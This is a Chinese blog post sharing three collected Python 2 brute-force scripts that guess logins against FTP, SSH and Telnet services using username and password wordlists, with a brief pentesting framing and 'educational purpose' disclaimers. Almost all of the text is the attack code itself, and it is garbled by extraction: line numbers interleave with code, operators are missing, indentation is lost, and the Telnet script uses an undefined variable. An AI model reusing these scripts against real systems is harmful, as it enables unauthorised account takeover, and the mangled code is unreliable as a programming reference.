在渗透测试当中，免不了要进行密码破解。以下为我搜集的一些python暴力破解脚本，并非原创作品，但有借鉴意义。

FTP暴力破解脚本

001	#!/usr/bin/env python

002	#-*-coding = utf-8-*-

003	#author:@xfk

004	#blog:@blog.sina.com.cn/kaiyongdeng

005	#date:@2012-05-08

006

007	import sys, os, time

008	from ftplib import FTP

009	docs = """

010	[*] This was written for educational purpose and pentest only. Use it at your own risk.

011	[*] Author will be not responsible for any damage!

012	[*] Toolname : ftp_bf.py

013	[*] Coder :

014	[*] Version : 0.1

015	[*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt

016

"""

017

018	if sys.platform == 'linux' or sys.platform == 'linux2':

019	clearing = 'clear'

020

else:

021	clearing = 'cls'

022	os.system(clearing)

023	R = "\033[31m";

024	G = "\033[32m";

025	Y = "\033[33m"

026	END = "\033[0m"

027	def logo():

028	print G "\n |---------------------------------------------------------------|"

029	print " | |"

030	print " | blog.sina.com.cn/kaiyongdeng |"

031	print " | 08/05/2012 ftp_bf.py v.0.1 |"

032	print " | FTP Brute Forcing Tool |"

033	print " | |"

034	print " |---------------------------------------------------------------|\n"

035	print " \n [-] %s\n" % time.strftime("%X")

036	print docs END

037

038	def help():

039	print R "[*]-t, --target ip/hostname <> Our target"

040	print "[*]-u, --usernamelist usernamelist <> usernamelist path"

041	print "[*]-p, --passwordlist passwordlist <> passwordlist path"

042	print "[*]-h, --help help <> print this help"

043	print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt" END sys.exit(1)

044

045	def bf_login(hostname,username,password):

046	# sys.stdout.write("\r[!]Checking : %s " % (p))

047	# sys.stdout.flush()

048

try:

049	ftp = FTP(hostname)

050	ftp.login(hostname,username, password)

051	ftp.retrlines('list')

052	ftp.quit()

053	print Y "\n[!] w00t,w00t!!! We did it ! "

054	print "[ ] Target : ",hostname, ""

055	print "[ ] User : ",username, ""

056	print "[ ] Password : ",password, "" END

057

return 1

058	# sys.exit(1)

059	except Exception, e:

060	pass except KeyboardInterrupt: print R "\n[-] Exiting ...\n" END

061	sys.exit(1)

062

063	def anon_login(hostname):

064

try:

065	print G "\n[!] Checking for anonymous login.\n" END

066	ftp = FTP(hostname) ftp.login()

067	ftp.retrlines('LIST')

068	print Y "\n[!] w00t,w00t!!! Anonymous login successfuly !\n" END

069	ftp.quit()

070	except Exception, e:

071	print R "\n[-] Anonymous login failed...\n" END

072

pass

073

074	def main():

075

logo()

076

try:

077	for arg in sys.argv:

078	if arg.lower() == '-t' or arg.lower() == '--target':

079	hostname = sys.argv[int(sys.argv[1:].index(arg)) 2]

080	elif arg.lower() == '-u' or arg.lower() == '--usernamelist':

081	usernamelist = sys.argv[int(sys.argv[1:].index(arg)) 2]

082	elif arg.lower() == '-p' or arg.lower() == '--passwordlist':

083	passwordlist = sys.argv[int(sys.argv[1:].index(arg)) 2]

084	elif arg.lower() == '-h' or arg.lower() == '--help':

085

help()

086	elif len(sys.argv) <= 1:

087

help()

088

except:

089	print R "[-]Cheak your parametars input\n" END

090

help()

091

092	print G "[!] BruteForcing target ..." END

093	anon_login(hostname)

094	# print "here is ok"

095	# print hostname

096

try:

097	usernames = open(usernamelist, "r")

098	user = usernames.readlines()

099	count1 = 0

100	while count1 < len(user):

101	user[count1] = user[count1].strip()

102	count1  =1

103

except:

104	print R "\n[-] Cheak your usernamelist path\n" END

105	sys.exit(1)

106

107	# print "here is ok ",usernamelist,passwordlist

108

try:

109	passwords = open(passwordlist, "r")

110	pwd = passwords.readlines()

111	count2 = 0

112	while count2 < len(pwd):

113	pwd[count2] = pwd[count2].strip()

114	count2  =1

115

except:

116	print R "\n[-] Check your passwordlist path\n" END

117	sys.exit(1)

118

119	print G "\n[ ] Loaded:",len(user),"usernames"

120	print "\n[ ] Loaded:",len(pwd),"passwords"

121	print "[ ] Target:",hostname

122	print "[ ] Guessing...\n" END

123	for u in user: for p in pwd:

124	result = bf_login(hostname,u.replace("\n",""),p.replace("\n",""))

125	if result != 1:

126	print G "[ ]Attempt uaername:%s password:%s..." % (u,p)   R "Disenable" END

127

else:

128	print G "[ ]Attempt uaername:%s password:%s..." % (u,p)   Y "Enable" END

129	if not result :

130	print R "\n[-]There is no username ans password enabled in the list."

131	print "[-]Exiting...\n" END

132

133	if __name__ == "__main__":

134

main()

SSH暴力破解

001	#!/usr/bin/env python

002	#-*-coding = UTF-8-*-

003	#author@:dengyongkai

004	#blog@:blog.sina.com.cn/kaiyongdeng

005

006

007	import sys

008

import os

009	import time

010	#from threading import Thread

011

012

try:

013	from paramiko import SSHClient

014	from paramiko import AutoAddPolicy

015	except ImportError:

016	print G '''

017	You need paramiko module.

018

019	http://www.lag.net/paramiko/

020

021	Debian/Ubuntu: sudo apt-get install aptitude

022	: sudo aptitude install python-paramiko\n''' END

023	sys.exit(1)

024

025	docs =  """

026	[*] This was written for educational purpose and pentest only. Use it at your own risk.

027	[*] Author will be not responsible for any damage!

028	[*] Toolname        : ssh_bf.py

029	[*] Author          : xfk

030	[*] Version         : v.0.2

031	[*] Example of use  : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]

032

"""

033

034

035	if sys.platform == 'linux' or sys.platform == 'linux2':

036	clearing = 'clear'

037

else:

038	clearing = 'cls'

039	os.system(clearing)

040

041

042	R = "\033[31m";

043	G = "\033[32m";

044	Y = "\033[33m"

045	END = "\033[0m"

046

047

048	def logo():

049	print G "\n                |---------------------------------------------------------------|"

050	print "                |                                                               |"

051	print "                |               blog.sina.com.cn/kaiyongdeng                    |"

052	print "                |                16/05/2012 ssh_bf.py v.0.2                     |"

053	print "                |                  SSH Brute Forcing Tool                       |"

054	print "                |                                                               |"

055	print "                |---------------------------------------------------------------|\n"

056	print " \n                     [-] %s\n" % time.ctime()

057	print docs END

058

059

060	def help():

061	print Y "       [*]-H       --hostname/ip       <>the target hostname or ip address"

062	print "     [*]-P       --port          <>the ssh service port(default is 22)"

063	print "     [*]-U       --usernamelist      <>usernames list file"

064	print "     [*]-P       --passwordlist      <>passwords list file"

065	print "     [*]-H       --help          <>show help information"

066	print "     [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]" END

067	sys.exit(1)

068

069	def BruteForce(hostname,port,username,password):

070

'''

071	Create SSH connection to target

072

'''

073	ssh = SSHClient()

074	ssh.set_missing_host_key_policy(AutoAddPolicy())

075

try:

076	ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False)

077	status = 'ok'

078	ssh.close()

079	except Exception, e:

080	status = 'error'

081

pass

082	return status

083

084

085	def makelist(file):

086

'''

087	Make usernames and passwords lists

088

'''

089	items = []

090

091

try:

092	fd = open(file, 'r')

093	except IOError:

094	print R 'unable to read file \'%s\'' % file END

095

pass

096

097	except Exception, e:

098	print R 'unknown error' END

099

pass

100

101	for line in fd.readlines():

102	item = line.replace('\n', '').replace('\r', '')

103	items.append(item)

104	fd.close()

105	return items

106

107	def main():

108

logo()

109	#   print "hello wold"

110

try:

111	for arg in sys.argv:

112	if arg.lower() == '-t' or arg.lower() == '--target':

113	hostname = str(sys.argv[int(sys.argv[1:].index(arg)) 2])

114	if arg.lower() == '-p' or arg.lower() == '--port':

115	port = sys.argv[int(sys.argv[1:].index(arg)) 2]

116	elif arg.lower() == '-u' or arg.lower() == '--userlist':

117	userlist = sys.argv[int(sys.argv[1:].index(arg)) 2]

118	elif arg.lower() == '-w' or arg.lower() == '--wordlist':

119	wordlist = sys.argv[int(sys.argv[1:].index(arg)) 2]

120	elif arg.lower() == '-h' or arg.lower() == '--help':

121

help()

122	elif len(sys.argv) <= 1:

123

help()

124

except:

125	print R "[-]Cheak your parametars input\n" END

126

help()

127	print G "\n[!] BruteForcing target ...\n" END

128	#        print "here is ok"

129	#        print hostname,port,wordlist,userlist

130	usernamelist = makelist(userlist)

131	passwordlist = makelist(wordlist)

132

133	print Y "[*] SSH Brute Force Praparing."

134	print "[*] %s user(s) loaded." % str(len(usernamelist))

135	print "[*] %s password(s) loaded." % str(len(passwordlist))

136	print "[*] Brute Force Is Starting......." END

137

try:

138	for username in usernamelist:

139	for password in passwordlist:

140	print G "\n[ ]Attempt uaername:%s password:%s..." % (username,password) END

141	current = BruteForce(hostname, port, username, password)

142	if current == 'error':

143	print R "[-]O*O The username:%s and password:%s Is Disenbabled...\n" % (username,password) END

144	#                               pass

145

else:

146	print G "\n[ ] ^-^ HaHa,We Got It!!!"

147	print "[ ] username: %s" % username

148	print "[ ] password: %s\n" % password END

149	#                                   sys.exit(0)

150

except:

151	print R "\n[-] There Is Something Wrong,Pleace Cheak It."

152	print "[-] Exitting.....\n" END

153

raise

154	print Y "[ ] Done.^-^\n" END

155	sys.exit(0)

156

157

158	if __name__ == "__main__":

159

main()

TELNET密码暴力破解

01	#!usr/bin/python

02	#Telnet Brute Forcer

03	#http://www.darkc0de.com

04	#d3hydr8[at]gmail[dot]com

05

06	import threading, time, random, sys, telnetlib

07	from copy import copy

08

09	if len(sys.argv) !=4:

10	print "Usage: ./telnetbrute.py "

11	sys.exit(1)

12

13

try:

14	users = open(sys.argv[2], "r").readlines()

15	except(IOError):

16	print "Error: Check your userlist path\n"

17	sys.exit(1)

18

19

try:

20	words = open(sys.argv[3], "r").readlines()

21	except(IOError):

22	print "Error: Check your wordlist path\n"

23	sys.exit(1)

24

25	print "\n\t   d3hydr8[at]gmail[dot]com TelnetBruteForcer v1.0"

26	print "\t--------------------------------------------------\n"

27	print "[ ] Server:",sys.argv[1]

28	print "[ ] Users Loaded:",len(users)

29	print "[ ] Words Loaded:",len(words),"\n"

30

31	wordlist = copy(words)

32

33	def reloader():

34	for word in wordlist:

35	words.append(word)

36

37	def getword():

38	lock = threading.Lock()

39	lock.acquire()

40	if len(words) != 0:

41	value = random.sample(words,  1)

42	words.remove(value[0])

43

44

else:

45	print "\nReloading Wordlist - Changing User\n"

46	reloader()

47	value = random.sample(words,  1)

48	users.remove(users[0])

49

50	lock.release()

51	if len(users) ==1:

52	return value[0][:-1], users[0]

53

else:

54	return value[0][:-1], users[0][:-1]

55

56	class Worker(threading.Thread):

57

58	def run(self):

59	value, user = getword()

60

try:

61	print "-"*12

62	print "User:",user,"Password:",value

63	tn = telnetlib.Telnet(sys.argv[1])

64	tn.read_until("login: ")

65	tn.write(user   "\n")

66	if password:

67	tn.read_until("Password: ")

68	tn.write(value   "\n")

69	tn.write("ls\n")

70	tn.write("exit\n")

71	print tn.read_all()

72	print "\t\nLogin successful:",value, user

73	tn.close()

74	work.join()

75	sys.exit(2)

76

except:

77

pass

78

79	for I in range(len(words)*len(users)):

80	work = Worker()

81	work.start()

82	time.sleep(1)